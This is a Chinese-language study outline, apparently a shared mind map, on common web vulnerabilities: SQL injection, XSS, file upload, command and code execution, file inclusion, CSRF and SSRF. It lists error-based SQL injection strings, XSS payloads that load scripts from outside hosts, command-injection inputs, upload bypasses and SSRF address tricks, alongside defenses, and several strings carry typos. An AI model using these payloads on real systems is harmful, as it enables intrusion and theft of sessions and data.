Web常见漏洞
2022-10-09 19:46:38 0 举报AI智能生成
根据web漏洞常见类型,整理了漏洞的利用条件、挖掘方法、常用代码等
作者其他创作
大纲/内容
SQL注入
注入点查找
and1=1/and1=2(整型)
随机输入(整型)
-1/+1回显上下页(整型)
单引号(字符型整型)
and sleep(5)(判断页面返回时间)
注入分类
根据语法
可联合查询注入
前提
能使用union
页面必须有显示位
注入步骤
找到注入点并判断闭合字符
判断数据库类型
猜解列数,爆显示位
得到基本信息(如数据库名、数据库版本等)
清解表名
得到列名
得到列值
报错型注入
前提
页面没有显示位
源码使用了echo mysqlerror(输出了错误信息
注入速度快、语句复杂、不能使用group_.concat0,只能用limit依次清解
注入手法
?id=2'and (select 1 from (select count(*),concat(floor(rand(0)*2).(select (select 报错语句)from information_schema.tables limit0,1)x from
information_schema.tables group by )a )-
?id=2'and updatexml(1,concat(Ox7e,(SELECT @@version),0x7e),1)
?id=1+and extractvalue(1,concat(Ox7e,(select @@version),0x7e))
使用公式依次替换语句即可,后续步骤和union注入一样
布尔型注入
前提
页面存在注入但是没有显示位且源码没有使用echo mysql_error(输出错误信息
注入手法
?id=1and注入语句)-+根据返回结果是否相同来得到数据
主要利用了length0、asci0、substr0得到结果
基于时间延迟注入
根据页面返回时间的不同来得到数据
多语句查询
只在MSSQL数据库存在
一个SQL语句后跟分号后再跟一个语句即可执行两个语句
根据类型
整型
字符串型
搜索型
注入位置
GET
POST
X-Forwarded-For
Cookie
User-Agent
XSS
危害
盗取管理员cookie
Xss蠕虫
挂马
网站重定向
修改网顶内容
攻击场景
各类SNS
邮件系统
BBS
微博
主要是一些大型社交网站
前提条件
反射型xss
一般是url参数中的值能回显到页面且url参数过滤不严
存储型xss
可以提交内容
提交的内容可被管理员或其他用户看到
提交的内容未被过滤或过滤不严
漏洞位置
在标签中<div>xss test</div>
在属性内<input type="text"name="content'"value="xss test'">
可以使用">xss test来测试
常见Payload
<script src='http://b.ioio.pub/xss/probe.js'></script>
<img src="http://a.com/xss/1.js"/>
<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js'";>
XSS挖掘
手工检测
般先输入AAAA<>"&'()查看过滤了哪些字符
全自动XSS检测
APPSCAN、AWVS、Burp Suite、XSSER、XSSF
防御
过滤输入与输出
httponly
文件上传
常见可执行文件后缀:
php php2 php3 php5 phtml
asp aspx ascx ashx cer asa
jsp jspx
php php2 php3 php5 phtml
asp aspx ascx ashx cer asa
jsp jspx
漏洞挖掘
找上传点,如头像、附件等的上传
找类似upload的脚本文件或目录
找编辑器目录
利用条件
首先,上传的文件可被执行
其次,用户在web可以访问到这个文件
最后,用户上传的文件未被压宿、格式化等改变内容
漏洞分类
配置不当直接getshell
本地上传被绕过
burp suite
服务端过滤被绕过
黑名单绕过
MIME绕过
截断上传
文件攻击
.htaccess
.user.ini
检测文件内容
文件幻数
00截断上传
文件解析漏洞
IIS解析漏洞
建立*.asp、*.asa格式的文件夹下的文件会以asp解析
*.asp;1jpg会以asp解析
Apache解析漏洞
当Apache遇到不认识的扩展名时会依次向前解析,若都不认识测暴漏源码
Apache2.0.59|2.2.62.2.82.2.112.2.171有解析漏洞
Nginx解析漏洞
低版本的可在任意文件名后添加600.php进行解析
PHP CGI解析漏洞
前提条件:cgi,fix_pathinfo=1
IIS7/7.5中,a.com/x.txt/x.php的x.txt会被解析为php(在a.com/x.txt后添加x.php)
Nginxt也和IIS7一样,任意文件名任意文件名.php会被解析为php
开源编辑器上传漏洞
命令执行
利用条件
php中使用了ysytem、exec、shel_exec、passthru、popen、proc_popens等函数
用户可以控制函数中的参数
对用户参数未过滤或过滤不严
示例
system("$arg":/直接输入即可
system("bin/prog $arg"); //直接输入;ls
ystem("bin/prog -p $arg");//和上面一样
system("bin/prog -p=\"$arg\""); //可以输入";ls;"
system("bin/prog -p='$arg");/可以输入';ls;'
漏洞修复
少用执行命令的函数
参数值尽量用引号包括
对爹数过滤,对敏感字符进行过滤
代码执行
防御
不使用eval
对字符串进行转义
不使用preg_replacef的e修饰符,使用preg_replace_.callback替换
示例
www.xx.com/new/detail/id/{$_POST[xx]}}
漏洞挖掘
框架找漏洞
www.xx.com/news/show/id/124
漏洞利用点
执行代码的函数:eval、assert
callbackl函数:preg_replace + /e模式
反序列化(unserialize)
相关函数
php:eval、asert
python:exec
文件包含
函数
include
include once
require
require_once
利用条件
包含的文件中只要内容符合php规范,不管扩展名是什么都
会被php解析,不符合php规范测暴漏源码
漏洞分类
本地包含
上传图片马然后包含
读敏感文件
包含日志getshell
包含伪协议
远程包含
要保证allow_url_fopen和allow_url_includej为On
防御
php中配置open_basedir
过滤./\
禁止服务器远程文件包含
CSRF
防御
二次确认
Tokeni认证
Referer
漏洞类型
GET
POST
利用场景
有意义的操作(如修改密码)
验证过于简单(参数固定、我们可以设置参数)
利用条件
知道u所有参数项并了解其含义
诱导用户访问构造好的POC
SSRF
条件
服务端提供了从其他服务器获取资源的功能
服务端为对目标地址做严格过滤
漏洞挖掘
从web功能上
通过ur分享内容
文件处理、编码处理、转码
在线番翻译
通过u地址加载与下载图片
阁片、文章的收藏
设置邮件接收服务器
从url关键字寻找
share、wap、url、link、src、source、target、u、3g、display、sourceurl、.imageurl、.domain等
漏洞验证
请求一张图片,看发起请求的是谁
绕过
http://A.com@10.10.10.10=10.10.10.10
IP使用其他进制:127.0.0.1=2130706433
使用短地址:http://10.10.116.11=http://t.cn/RwbLKDx
端口绕过:ip后面加个端口
xip.io
10.0.0.1.xip.i0=10.0.0.1
www.10.0.0.1.xip.io=10.0.0.1
mysite.10.0.0.1.xip.io=10.0.0.1
foo.bar.10.0.0.1.xip.io=10.0.0.1
js跳转
0 条评论
下一页
为你推荐
查看更多
